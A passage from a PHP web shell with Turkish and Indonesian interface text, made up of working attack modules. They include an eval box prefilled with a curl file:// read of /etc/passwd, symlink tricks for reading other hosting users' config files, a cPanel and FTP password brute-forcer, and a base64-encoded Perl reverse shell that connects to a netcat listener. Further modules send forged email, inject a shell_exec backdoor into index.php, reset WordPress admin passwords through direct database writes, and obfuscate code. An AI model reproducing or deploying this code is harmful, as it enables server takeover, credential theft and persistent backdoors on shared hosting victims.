2153. $query='http://toolbarqueries.google.com/tbr?client=navclient-auto&hl=en&ch='.CheckHash(HashURL($url)).'&features=Rank&q=info:'.$url.'&num=100&filter=0';
2154. $data=file_get_contents_curl($query);
2155. $pos = strpos($data,'Rank_');
2156. if($pos === false){}else{
2157. $pagerank = substr($data,$pos +9);
2158. return $pagerank;
2159. }
2160. }
2161. function file_get_contents_curl($url) {
2162. $ch = curl_init();
2163. curl_setopt($ch,CURLOPT_HEADER,0);
2164. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2165. curl_setopt($ch,CURLOPT_URL,$url);
2166. $data = curl_exec($ch);
2167. curl_close($ch);
2168. return $data;
2169. }
2170. if(!$_POST['site']==''){
2171. $site = explode("
2172. ",$_POST['site']);
2173. foreach($site as $sites){
2174. $sites = trim($sites);
2175. $pr = getPageRank($sites);
2176. echo $sites.' => <b>'.$pr.'</b><br />';
2177. ob_flush();
2178. flush();
2179. }
2180. }
2181. }
2182. if ($_GET[id]=='eval'){
2183. $code=stripslashes($_POST['code']);
2184. echo '<center><br><h3> Eval PHP(aslýnda en etkili bypass methodlarýndan birisidir) </h3></center>
2185.     <center>
2186.     <form method="POST" action="">
2187.     <input type="hidden" name="id" value="eval">
2188.     <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'
2189. chdir("file:");
2190. chdir("etc");
2191. chdir("..");
2192. chdir("..");
2193.  
2194. $ch = curl_init();
2195.  
2196. curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
2197. curl_setopt($ch, CURLOPT_HEADER, 0);
2198.  
2199. curl_exec($ch);
2200.  
2201. curl_close($ch);</textarea><br><br>
2202.     <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
2203.     </form>
2204.     <textarea rows="10" cols="85" class="textarea">';
2205. eval($code);
2206. echo '</textarea><br><br>';
2207. }
2208. if ($_GET[id]=='symlist'){
2209. $mk = @mkdir('sym',0777);
2210. $htcs  = "Options all
2211. DirectoryIndex Sux.html
2212. AddType text/plain .php
2213. AddHandler server-parsed .php
2214.  AddType text/plain .html
2215. AddHandler txt .html
2216. Require None
2217. Satisfy Any";
2218. $f =@fopen ('sym/.htaccess','w');
2219. @fwrite($f ,$htcs);
2220. $sym = @symlink('/','sym/root');
2221. $pg = basename('index.php');
2222. $d00m = @file('/etc/named.conf');
2223. if(!$d00m)
2224. {
2225. die (' <br><br><center><b>named.conf</b> Dosyasý okunamýyor Manuel symlink deneyiniz</center>');
2226. }
2227. else
2228. {
2229. echo "<div class='tmp'><table align='center' width='40%'><td>Domainler</td><td>Users</td><td>symlink </td>";
2230. foreach($d00m as $dom){
2231. if(eregi('zone',$dom)){
2232. preg_match_all('#zone "(.*)"#',$dom,$domsws);
2233. flush();
2234. if(strlen(trim($domsws[1][0])) >2){
2235. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0]));
2236. $site = $user['name'] ;
2237. @symlink('/','sym/root');
2238. $site = $domsws[1][0];
2239. $ir = 'ir';
2240. $il = 'il';
2241. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
2242. {
2243. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0].'</div>';
2244. }
2245. echo "
2246. <tr>
2247.  
2248. <td>
2249. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0].'/>'.$site.' </a> </div>
2250. </td>
2251.  
2252.  
2253. <td>
2254. '.$user['name']."
2255. </td>
2256.  
2257.  
2258. <td>
2259. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
2260. </td>
2261.  
2262.  
2263. </tr></div> ";
2264. flush();
2265. }
2266. }
2267. }
2268. }
2269. }
2270. else
2271. {
2272. $pfile = $_POST['file'];
2273. $symfile = $_POST['symfile'];
2274. $symlink = $_POST['symlink'];
2275. if ($symlink)
2276. {
2277. @symlink("$pfile","sym/$symfile");
2278. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
2279. exit;
2280. }
2281. }
2282. if ($_GET[id]=='manuelsym'){
2283. echo '
2284. Manuel Symlink bölümü
2285.  
2286. <br /><br />
2287. <form method="post">
2288. <input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
2289. <input type="text" name="symfile" value="siyanur5x.txt" size="60"/><br /><br />
2290. <input type="submit" value="symlink çek" name="symlink" /> <br /><br />
2291.  
2292.  
2293.  
2294. </form>
2295. ';
2296. $pfile = $_POST['file'];
2297. $symfile = $_POST['symfile'];
2298. $symlink = $_POST['symlink'];
2299. if ($symlink)
2300. {
2301. @symlink("$pfile","sym/$symfile");
2302. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
2303. exit;
2304. }
2305. }
2306. if ($_GET[id]=='cpanel'){
2307. @ini_set('memory_limit',1000000000000);
2308. $connect_timeout=5;
2309. @set_time_limit(0);
2310. $submit = $_REQUEST['submit'];
2311. $users = $_REQUEST['users'];
2312. $pass = $_REQUEST['passwords'];
2313. $target = $_REQUEST['target'];
2314. $option = $_REQUEST['option'];
2315. $page = $_GET['page'];
2316. if($target == ''){
2317. $target = 'localhost';
2318. }
2319. @ini_set('memory_limit',1000000000000);
2320. $connect_timeout=5;
2321. @set_time_limit(0);
2322. $submit = $_REQUEST['submit'];
2323. $users = $_REQUEST['users'];
2324. $pass = $_REQUEST['passwords'];
2325. $target = $_REQUEST['target'];
2326. $option = $_REQUEST['option'];
2327. if($target == ''){
2328. $target = 'localhost';
2329. }
2330. print " <div align='center'>
2331. <form method='post' style='border: 1px solid #000000'><br><br>
2332. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0  cellPadding=0 width='40%' borderColorLight=#666666 border=0><tr><td>
2333. <b> Host  : </font><input type='text' name='target' size='16' value= $target style='border: font-family:Tahoma; font-weight:bold;'></p></font></b></p>
2334. <div align='center'><br>
2335. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0  cellPadding=0 width='50%'  borderColorLight=#666666 border=0>
2336. <tr>
2337. <center>
2338. <b>Kullanýcý adlarý</b></center>
2339.  
2340.  
2341. </tr>
2342. </table>
2343. <p align='center'>
2344. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; '>$users</textarea>
2345.  
2346. <center><b>Þifre listesi</b></center>
2347. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D;'>$pass</textarea><br>
2348. <br>                        
2349. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
2350. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp    <input type='submit' value='Kýrmaya baþla' name='submit' ></p>
2351. </td></tr></table></td></tr></form><p align= 'left'>";
2352. function ftp_check($host,$user,$pass,$timeout){
2353. $ch = curl_init();
2354. curl_setopt($ch,CURLOPT_URL,"ftp://$host");
2355. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2356. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
2357. curl_setopt($ch,CURLOPT_FTPLISTONLY,1);
2358. curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");
2359. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
2360. curl_setopt($ch,CURLOPT_FAILONERROR,1);
2361. $data = curl_exec($ch);
2362. if ( curl_errno($ch) == 28 ) {
2363. print '<b> Hata : Süre dýþý kaldýn , tekrar dene !</b>';
2364. exit;}
2365. elseif ( curl_errno($ch) == 0 ){
2366. print
2367. "<b>[ user@aria-security.com ]# </b>
2368. <b> Saldýrý baþarýlý , bulunan kullanýcý adý , <font color='#FF0000'> $user </font> ve Þifre ,
2369. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
2370. function cpanel_check($host,$user,$pass,$timeout){
2371. $ch = curl_init();
2372. curl_setopt($ch,CURLOPT_URL,"http://$host:2082");
2373. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2374. curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
2375. curl_setopt($ch,CURLOPT_USERPWD,"$user:$pass");
2376. curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
2377. curl_setopt($ch,CURLOPT_FAILONERROR,1);
2378. $data = curl_exec($ch);
2379. if ( curl_errno($ch) == 28 ) {
2380. print '<b> Error : Connection timed out , make confidence about validation of target !</b>';
2381. exit;}
2382. elseif ( curl_errno($ch) == 0 ){
2383. print
2384. "
2385. <b> Saldýrý baþarýlý , bulunan kullanýcý adý , <font color='#FF0000'> $user </font> ve Þifre ,
2386. <font color='#FF0000'> $pass </font></b><br>";}curl_close($ch);}
2387. if(isset($submit) &&!empty($submit)){
2388. $userlist = explode ("
2389. ",$users );
2390. $passlist = explode ("
2391. ",$pass );
2392. print '<b> Saldýrý baþladý ...</font></b><br>';
2393. foreach ($userlist as $user) {
2394. $_user = trim($user);
2395. foreach ($passlist as $password ) {
2396. $_pass = trim($password);
2397. if($option == 'ftp'){
2398. ftp_check($target,$_user,$_pass,$connect_timeout);
2399. }
2400. if ($option == 'cpanel')
2401. {
2402. cpanel_check($target,$_user,$_pass,$connect_timeout);
2403. }
2404. }
2405. }
2406. }
2407. }
2408. if ($_GET[id]=='bc'){
2409. $bc_perl='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
2410. aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
2411. hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
2412. sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
2413. kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
2414. KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
2415. OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==';
2416. echo '
2417.     <p align="center"><font size="5"><b> Back Connecting </b></font></p>
2418.     <p align="center"><font color="black">Netcat aç bu komutu uygula:</font><i><font color="#FF0000"> nc -l -p 1542</font></i>
2419.     </p><br>
2420.     <div align="center"><form method="POST" action="">
2421.     <input type="text" name="pip" value="',$_SERVER['REMOTE_ADDR'],'" class="input" /> :
2422.     <input type="text" name="pport" size="5" value="1542" class="input" /> <br><br>
2423.     <input type="text" name="ppath" value="/tmp" class="input" /><br><br>
2424.     <input type="submit" value=" Connect " class="button" />
2425.     </form></div>';
2426. $pip=$_POST['pip'];$pport=$_POST['pport'];
2427. if ($pip <>'') {
2428. $fp=fopen($_POST['ppath'].DS.rand(0,10).'bc_perl_enhack.pl','w');
2429. if (!$fp){
2430. $Sonuç = 'Error: couldn\'t write file to open socket connection';
2431. }else {
2432. @fputs($fp,base64_decode($bc_perl));
2433. fclose($fp);
2434. $Sonuç = ex('perl '.$_POST['ppath'].'/bc_perl_enhack.pl '.$pip.' '.$pport.' &');
2435. }
2436. }
2437. }
2438. if ($_GET[id]=='feykmail'){
2439. echo "        <form enctype='multipart/form-data' method='POST'>
2440.        <table>
2441.        
2442.        <tr><td>Yollayan Adres</td></tr>
2443.        <tr>
2444.        <td align='left'>
2445.            <input type='text' name='from' />
2446.        </td>
2447.        </tr>
2448.        
2449.        <tr><td>Gidecek Adres</td></tr>
2450.        <tr>
2451.        <td align='left'>
2452.            <input type='text' name='to'/>
2453.        </td>
2454.        </tr>
2455.        
2456.        <tr><td>Konu Baslik</td></tr>
2457.        <tr>
2458.        <td align='left'>
2459.            <input type='text' name='subject' />
2460.        </td>
2461.        </tr>
2462.        
2463.        <tr><td>Dosya ekle</td></tr>
2464.        <tr>
2465.        <td align='left'>
2466.            <input name='uploaded' type='file'/>
2467.        </td>
2468.        </tr>
2469.        
2470.        <tr><td>Mesaj</td></tr>
2471.        <tr>
2472.        <td align='left'>
2473.            <TEXTAREA rows='15' cols='36' name='text'/></TEXTAREA>
2474.        </td>
2475.        </tr>
2476.        
2477.        <tr>
2478.        <td aling='right'>
2479.            <input type='submit' value='Gönder' name='sendamail'/>
2480.        </td>";
2481. if( isset($_POST['sendamail']) &&
2482. isset($_POST['from']) &&
2483. isset($_POST['to']) &&
2484. isset($_POST['subject']) &&
2485. isset($_POST['text']) )
2486. {
2487. $err = 'Errore invio !';
2488. $ok  = 1;
2489. $from    = $_POST['from'];
2490. $to      = $_POST['to'];
2491. $subject = $_POST['subject'];
2492. $message = $_POST['text'];
2493. $headers = "From: $from";
2494. if( isset( $_FILES['uploaded'] ) &&$uploaded_size )
2495. {
2496. $target = './uploads/';
2497. $target = $target .basename( $_FILES['uploaded']['name'] ) .'.dat';
2498. if($uploaded_size >350000)
2499. {
2500. $err = 'Allegato troppo grande (max 350 KB) !';
2501. $ok  = 0;
2502. }
2503. if( !move_uploaded_file($_FILES['uploaded']['tmp_name'],$target) )
2504. {
2505. $err = "Impossibile uploadare l'allegato !";
2506. $ok  = 0;
2507. }
2508. else
2509. {
2510. $fileatt      = $target;
2511. $fileatt_type = 'application/octet-stream';
2512. $fileatt_name = basename( $_FILES['uploaded']['name'] );
2513. $file = fopen($fileatt,'rb');
2514. $data = fread($file,filesize($fileatt));
2515. fclose($file);
2516. $semi_rand     = md5(time());
2517. $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
2518. $headers .= "
2519. MIME-Version: 1.0
2520. ".
2521. "Content-Type: multipart/mixed;
2522. ".
2523. " boundary=\"{$mime_boundary}\"";
2524. $message .= "This is a multi-part message in MIME format.
2525.  
2526. ".
2527. "--{$mime_boundary}
2528. ".
2529. "Content-Type:text/html; charset=\"iso-8859-1\"
2530. ".
2531. "Content-Transfer-Encoding: 7bit
2532.  
2533. ".
2534. $message ."
2535.  
2536. ";
2537. $data     = chunk_split(base64_encode($data));
2538. $message .= "--{$mime_boundary}
2539. ".
2540. "Content-Type: {$fileatt_type};
2541. ".
2542. " name=\"{$fileatt_name}\"
2543. ".
2544. "Content-Transfer-Encoding: base64
2545.  
2546. ".
2547. $data ."
2548.  
2549. ".
2550. "--{$mime_boundary}--
2551. ";
2552. }
2553. }
2554. if( !$ok )
2555. {
2556. echo "<font color='#FF0000'><b>$err</b></font>";
2557. @unlink($target);
2558. }
2559. else
2560. {
2561. if( @mail( $to,$subject,$message,$headers) ){
2562. echo '<b>Email Yollandi</b>';
2563. }
2564. else
2565. echo "<font color='#FF0000'><b>$err</b></font>";
2566. @unlink($target);
2567. }
2568. }
2569. }
2570. if ($_GET[id]=='command2'){
2571. echo "  <tr>
2572.    <td width='100%' height='1'>";
2573. if (empty($_POST['z3r'])){
2574. echo '<form method="POST">';
2575. echo '<input type="text" name="z3r" size="50" value="/home/hedefuser/public_html/index.php">';
2576. echo '<input type="submit" value="Encode">';
2577. echo '</form>';
2578. }else{
2579. $b4se64 =$_POST['z3r'];
2580. $heno =base64_encode($b4se64);
2581. echo '<p align="center">';
2582. echo '<textarea method="POST" rows="1" cols="80" wrar="off">';
2583. print $heno;
2584. echo '</textarea>';
2585. }
2586. echo '<form method="post" /><input type="text" name="cz" size="50" value="L2V0Yy9wYXNzd2Q=" /><input type="submit" value="OK !!" /><select name=dec><option value=show>Oku</option><option value=decode>Komut</option></select></form>';
2587. if( !empty($_POST['cz']) )
2588. if ($dec=='decode'){echo '<form name=form method=POST>';}
2589. echo "<p align=left><textarea method='POST' name='xCod' cols='60' rows='25' wrar='off' >";
2590. $ss=$_POST['cz'];
2591. $file = base64_decode($ss);
2592. if((curl_exec(curl_init('file:ftp://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../'.$file))) aNd emptY($file))
2593. if ($_POST['dec']=='decode'){echo base64_encode($_POST['xCod']);}
2594. echo '</textarea></p>';
2595. echo '</td>
2596. </tr>';
2597. }
2598. if ($_GET[a]=='reverse'){
2599. $site = "$_GET[site]";
2600. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
2601. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
2602. foreach($kursat[1] as $cem)
2603. {
2604. echo str_replace('?','',$cem).'<br>';
2605. }
2606. }
2607. if ($_GET[id]=='reversem'){
2608. echo '<br><b>http://www.</b> Koymadan yazýn <b>site.com</b> gibi ';
2609. echo '<br><form action="" method="post">
2610. <input type="text" name="site" />
2611. <input type="submit" value="gönder" />
2612. </form> ';
2613. $site = "$_POST[site]";
2614. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
2615. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
2616. foreach($kursat[1] as $cem)
2617. {
2618. echo str_replace('?','',$cem).'<br>';
2619. }
2620. }
2621. if ($_GET[id]=='md5'){
2622. echo '<form method="POST">
2623. <p><input type="md5_text" name="md5_text" id="md5_text">
2624. <input type="submit" name="md5_send" value="make hash">
2625. </form>';
2626. if(isset($_POST['md5_send']))
2627. {
2628. if(empty($_POST['md5_text']))
2629. {
2630. die ('you don\'t type word for make hash');
2631. }
2632. $word=$_POST['md5_text'];
2633. $word2 = md5("$word");
2634. print("<font color='#ff0000'>$word</font> hash = <b>$word2</b>");
2635. }
2636. }
2637. if ($_GET[id]=='Cmdinject'){
2638. echo " <br>     <tr>
2639.        <td class='td' style='border-bottom-width:thin'><form name='form3' method='post' action=''>
2640.          Backdoorlanacak dosya :
2641.              <INPUT NAME='IndexName' TYPE='TEXT' class='txt' size='23'>
2642.              <input name='Submit4' type='submit' value='Inject Cmd Sheller'>
2643.              <br><span class='txt' >Örnek : index.php</span>        
2644.        </form></td >
2645.      </tr>";
2646. if (isset($_POST['Submit4']))
2647. {
2648. $IName = (@$_POST['IndexName']);
2649. if ($IName == '') {
2650. echo '<font color=red>[+] Plz Insert Index Name, For Previous Directory Use ( ../ ) Symbol .</font><Br>';
2651. }
2652. else {
2653. $CMD = '<?php $cmdd=(@$_REQUEST["cmd"]); echo(shell_exec($cmdd)); ?>';
2654. $FFP = @fopen($IName,'a');
2655. $fWrite = @fwrite($FFP,$CMD);
2656. if ($fWrite) {
2657. echo '<font color=green>[+] CMD Sheller Successful Inj3cted .</font><BR>';
2658. }
2659. else {
2660. echo '<font color=red>[+] No Perm !</font><BR>';
2661. }
2662. }
2663. }
2664. }
2665. if ($_GET[id]=='uzakupload'){
2666. echo '</pre></form>';
2667. if (isset($_POST['upload'])) {$savefile = getcwd().'/'.$_FILES['file']['name']['0'];move_uploaded_file($_FILES['file']['tmp_name']['0'],$savefile);$filesizename = array(' Bytes',' KB',' MB',' GB',' TB',' PB',' EB',' ZB',' YB');$size = round($_FILES['file']['size']['0']/pow(1024,($i = floor(log($_FILES['file']['size']['0'],1024)))),2) .$filesizename[$i];print '<b>Uploaded be completed !</b><br>Details:<br>Filename: <b>'.$_FILES['file']['name']['0'] .'</b>.<br>Size: <b>'.$size .'</b>.';}
2668. echo '<br><u><b>Upload Files:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="file" name="file[]" size="50"><br><input type="submit" value="Upload File !" name="upload"></form><hr><br>';
2669. if (isset($_POST['upload_url'])) {$file=$_POST['upload_url_text'];$newfile=$_POST['rename'];if (!copy($file,$newfile)) {echo "failed to copy $file...
2670. ";}}
2671. echo '<u><b>Upload Files From URL:</b></u><form method="POST" enctype="multipart/form-data"><input type="hidden" name="action" value="add"><input type="text" name="upload_url_text" size="50"><br>Rename to: <input type="text" name="rename" size="10" value="inj.php"><br><input type="submit" value="Upload File !" name="upload_url"></form>';
2672. }
2673. if ($_GET[id]=='CloudBypass'){
2674. echo '
2675. <form method="POST"><br><br>
2676. <center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass
2677. <font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>
2678. <select class="inputz" name="krz">
2679.     <option>ftp</option>
2680.         <option>direct-conntect</option>
2681.             <option>webmail</option>
2682.                 <option>cpanel</option>
2683. </select>
2684. <input class="inputz" type="text" name="target" value="url">
2685. <input class="inputzbut" type="submit" value="Bypass"></center>
2686.  
2687. ';
2688. $target = $_POST['target'];
2689. if($_POST['krz'] == 'ftp') {
2690. $ftp = gethostbyname('ftp.'."$target");
2691. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
2692. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
2693. }
2694. if($_POST['krz'] == 'direct-conntect') {
2695. $direct = gethostbyname('direct-connect.'."$target");
2696. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
2697. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
2698. }
2699. if($_POST['krz'] == 'webmail') {
2700. $web = gethostbyname('webmail.'."$target");
2701. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
2702. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
2703. }
2704. if($_POST['krz'] == 'cpanel') {
2705. $cpanel = gethostbyname('cpanel.'."$target");
2706. echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
2707. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
2708. }
2709. }
2710. if ($_GET[id]=='read'){
2711. echo 'read /etc/named.conf';
2712. echo "<br /><br /><form method='post' action='?id=read&save=1'><textarea cols='80' rows='20' name='file'>";
2713. flush();
2714. flush();
2715. $file = '/etc/named.conf';
2716. $r3ad = @fopen($file,'r');
2717. if ($r3ad){
2718. $content = @fread($r3ad,@filesize($file));
2719. echo ''.htmlentities($content).'';
2720. }
2721. else if (!$r3ad)
2722. {
2723. $r3ad = @show_source($file) ;
2724. }
2725. else if (!$r3ad)
2726. {
2727. $r3ad = @highlight_file($file);
2728. }
2729. else if (!$r3ad)
2730. {
2731. $sm = @symlink($file,'sym.txt');
2732. if ($sm){
2733. $r3ad = @fopen('sym/sym.txt','r');
2734. $content = @fread($r3ad,@filesize($file));
2735. echo ''.htmlentities($content).'';
2736. }
2737. }
2738. echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";
2739. if(isset($_GET['save'])){
2740. $cont = stripcslashes($_POST['file']);
2741. $f = fopen('named.txt','w');
2742. $w = fwrite($f,$cont);
2743. if($w){
2744. echo '<br />Kayit tamam';
2745. }
2746. fclose($f);
2747. }
2748. function ex($text,$a,$b){
2749. $explode = explode($a,$text);
2750. $explode = explode($b,$explode[1]);
2751. return $explode[0];
2752. }
2753. }
2754. if ($_GET[id]=='sifrele'){
2755. $text = $_POST['code'];
2756. echo "
2757. <form method='post'><br><br><br>
2758. <textarea class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
2759. <select class='inputz' size='1' name='ope'>
2760. <option value='base64'>Base64</option>
2761. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
2762. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
2763. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
2764. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
2765. </form>";
2766. $submit = $_POST['submit'];
2767. if (isset($submit)){
2768. $op = $_POST['ope'];
2769. switch ($op) {case 'base64': $codi=base64_encode($text);
2770. break;case 'str': $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
2771. break;case 'gzinflate': $codi=base64_encode(gzdeflate(str_rot13($text)));
2772. break;default:break;}}
2773. $submit = $_POST['submits'];
2774. if (isset($submit)){
2775. $op = $_POST['ope'];
2776. switch ($op) {case 'base64': $codi=base64_decode($text);
2777. break;case 'str': $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
2778. break;case 'gzinflate': $codi=str_rot13(gzinflate(base64_decode($text)));
2779. break;default:break;}}
2780. echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
2781. }
2782. if ($_GET[id]=='hash'){
2783. $submit= $_POST['enter'];
2784. if (isset($submit)) {
2785. $pass = $_POST['password'];
2786. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN';
2787. $hash = md5($pass);
2788. $md4 = hash('md4',$pass);
2789. $hash_md5 = md5($salt.$pass);
2790. $hash_md5_double = md5(sha1($salt.$pass));
2791. $hash1 = sha1($pass);
2792. $sha256 = hash('sha256',$text);
2793. $hash1_sha1 = sha1($salt.$pass);
2794. $hash1_sha1_double = sha1(md5($salt.$pass));
2795. }
2796. echo '<form action="" method="post"><b><table class=tabnet>';
2797. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
2798. echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
2799. echo '<td><input class="inputz" type="text" name="password" size="40" />';
2800. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
2801. echo '</td></tr><br>';
2802. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
2803. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
2804. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
2805. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
2806. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
2807. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
2808. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
2809. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
2810. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
2811. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
2812. }
2813. if ($_GET[id]=='wpres'){
2814. echo '<form action="?id=wpres" method="post">';
2815. if(empty($_POST['pwd'])){
2816. echo "<FORM method='POST'>
2817. <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Hostname</td><td>
2818. <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
2819. <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;username</td><td>
2820. <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td>&nbsp;&nbsp;password</td><td>
2821. <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
2822. <tr><td>&nbsp;&nbsp;User baru</td><td>
2823. <input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
2824. <tr><td>&nbsp;&nbsp;Pass Baru</td><td>
2825. <input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />&nbsp;
2826.  
2827. <input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
2828. </td></tr> </table><br><br><br><br>
2829. ";
2830. }else{
2831. $localhost = $_POST['localhost'];
2832. $database  = $_POST['database'];
2833. $username  = $_POST['username'];
2834. $password  = $_POST['password'];
2835. $pwd   = $_POST['pwd'];
2836. $admin = $_POST['admin'];
2837. @mysql_connect($localhost,$username,$password) or die(mysql_error());
2838. @mysql_select_db($database) or die(mysql_error());
2839. $hash = crypt($pwd);
2840. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
2841. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
2842. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
2843. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
2844. $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
2845. $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
2846. $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
2847. if($a4s){
2848. echo '<b> Success ..!! :)) sekarang bisa login ke wp-admin</b> ';
2849. }
2850. }
2851. echo '
2852.   </div>';
2853. }
2854. if ($_GET[id]=='joomlares'){
2855. echo '<form action="?id=joomlares" method="post">';
2856. if(empty($_POST['pwd'])){
2857. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
2858. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td>&nbsp;&nbsp;Database</td><td>
